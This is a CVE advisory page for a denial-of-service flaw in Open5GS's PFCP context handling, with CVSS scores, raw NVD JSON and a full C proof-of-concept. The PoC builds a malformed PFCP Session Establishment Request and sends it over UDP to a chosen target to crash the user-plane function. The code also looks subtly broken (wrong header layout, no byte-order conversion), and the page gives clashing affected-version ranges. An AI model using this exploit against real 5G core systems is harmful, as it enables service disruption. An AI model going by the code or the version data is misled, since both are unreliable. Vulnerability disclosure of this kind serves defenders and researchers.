Security Vulnerability Report
CVE-2025-14954 CVSS 3.7 LOW

CVE-2025-14954

Published: 2025-12-19 16:15:55
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Open5GS up to 2.7.6. Affected are the functions ogs_pfcp_pdr_find_or_add, ogs_pfcp_far_find_or_add, ogs_pfcp_urr_find_or_add and ogs_pfcp_qer_find_or_add in lib/pfcp/context.c of the component QER/FAR/URR/PDR. The manipulation leads to a reachable assertion. The attack can be initiated remotely. The attack complexity is rated as high, and exploitation is reported to be difficult. The exploit has been disclosed to the public and may be used. The patch is identified as commit 442369dcd964f03d95429a6a01a57ed21f7779b7. Applying the patch is the recommended fix for this issue.

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-14954 PoC - Open5GS PFCP Reachable Assertion
 * Target: Open5GS <= 2.7.6
 * This PoC demonstrates sending a crafted PFCP Session Establishment Request
 * that triggers assertion in ogs_pfcp_pdr_find_or_add/ogs_pfcp_far_find_or_add/etc.
 *
 * Note: This is for educational and authorized testing purposes only.
 * Requires network access to the target UPF PFCP port (8805/UDP by default).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>     /* uint8_t, uint16_t, uint32_t, uint64_t */
#include <unistd.h>     /* close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>  /* inet_addr, htons */

/* PFCP IE types */
#define PFCP_IE_NODE_ID 56
#define PFCP_IE_F_SEID 57
#define PFCP_IE_PDR_ID 60
#define PFCP_IE_CREATE_PDR 1
#define PFCP_IE_CREATE_FAR 3
#define PFCP_IE_CREATE_URR 7
#define PFCP_IE_CREATE_QER 11

#pragma pack(push, 1)
typedef struct {
    uint8_t flags;
    uint16_t message_type;
    uint32_t message_length;
    uint64_t seid;
} pfcp_header_t;

typedef struct {
    uint16_t ie_type;
    uint16_t ie_length;
    uint8_t instance;
    uint8_t flags;
} pfcp_ie_header_t;
#pragma pack(pop)

void create_pfcp_session_establishment(uint8_t *buffer, size_t *len)
{
    pfcp_header_t *hdr = (pfcp_header_t *)buffer;
    size_t offset = sizeof(pfcp_header_t);

    /* PFCP Header - Session Establishment Request */
    hdr->flags = 0x20; /* S flag = 1, SEID present */
    hdr->message_type = 0x32; /* Session Establishment Request */
    hdr->message_length = 0; /* Will update later */
    hdr->seid = 0x0000000100000001ULL; /* Source SEID */

    /* IE: Node ID */
    pfcp_ie_header_t *node_ie = (pfcp_ie_header_t *)(buffer + offset);
    node_ie->ie_type = PFCP_IE_NODE_ID;
    node_ie->ie_length = 5;
    node_ie->instance = 0;
    node_ie->flags = 0x01; /* IPv4 */
    *(buffer + offset + 4) = 127;
    *(buffer + offset + 5) = 0;
    *(buffer + offset + 6) = 0;
    *(buffer + offset + 7) = 1;
    offset += 8;

    /* IE: Create PDR - Trigger assertion by duplicate ID */
    pfcp_ie_header_t *pdr_ie = (pfcp_ie_header_t *)(buffer + offset);
    pdr_ie->ie_type = PFCP_IE_CREATE_PDR;
    pdr_ie->ie_length = 10;
    pdr_ie->instance = 0;
    offset += 4;

    /* PDR ID sub-IE */
    pfcp_ie_header_t *pdr_id = (pfcp_ie_header_t *)(buffer + offset);
    pdr_id->ie_type = PFCP_IE_PDR_ID;
    pdr_id->ie_length = 2;
    pdr_id->instance = 0;
    *(uint16_t *)(buffer + offset + 4) = 0xFFFF; /* Invalid ID to trigger assertion */
    offset += 6;

    /* Update message length */
    hdr->message_length = offset - sizeof(pfcp_header_t);
    *len = offset;
}

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in target;
    uint8_t packet[1024];
    size_t pkt_len;

    if (argc < 2) {
        printf("Usage: %s <target_ip>\n", argv[0]);
        return 1;
    }

    sock = socket(AF_INET, SOCK_DGRAM, 17); /* UDP */
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(8805);
    target.sin_addr.s_addr = inet_addr(argv[1]);

    create_pfcp_session_establishment(packet, &pkt_len);

    printf("Sending crafted PFCP Session Establishment to %s:8805\n", argv[1]);
    printf("Packet size: %zu bytes\n", pkt_len);

    if (sendto(sock, packet, pkt_len, 0, (struct sockaddr *)&target, sizeof(target)) < 0) {
        perror("sendto");
        return 1;
    }

    printf("Packet sent. Target may crash or log assertion failure.\n");
    close(sock);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14954", "sourceIdentifier": "[email protected]", "published": "2025-12-19T16:15:55.050", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Open5GS up to 2.7.6. Affected is the function ogs_pfcp_pdr_find_or_add/ogs_pfcp_far_find_or_add/ogs_pfcp_urr_find_or_add/ogs_pfcp_qer_find_or_add in the library lib/pfcp/context.c of the component QER/FAR/URR/PDR. The manipulation leads to reachable assertion. It is possible to initiate the attack remotely. The attack's complexity is rated as high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of the patch is 442369dcd964f03d95429a6a01a57ed21f7779b7. Applying a patch is the recommended action to fix this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": 
"Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.5", "matchCriteriaId": "7D0FBF91-87F5-4984-AC37-744D9BFC13C0"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/442369dcd964f03d95429a6a01a57ed21f7779b7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4181", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4181#issue-3667069101", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4181#issuecomment-3615646842", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.337590", ... (truncated)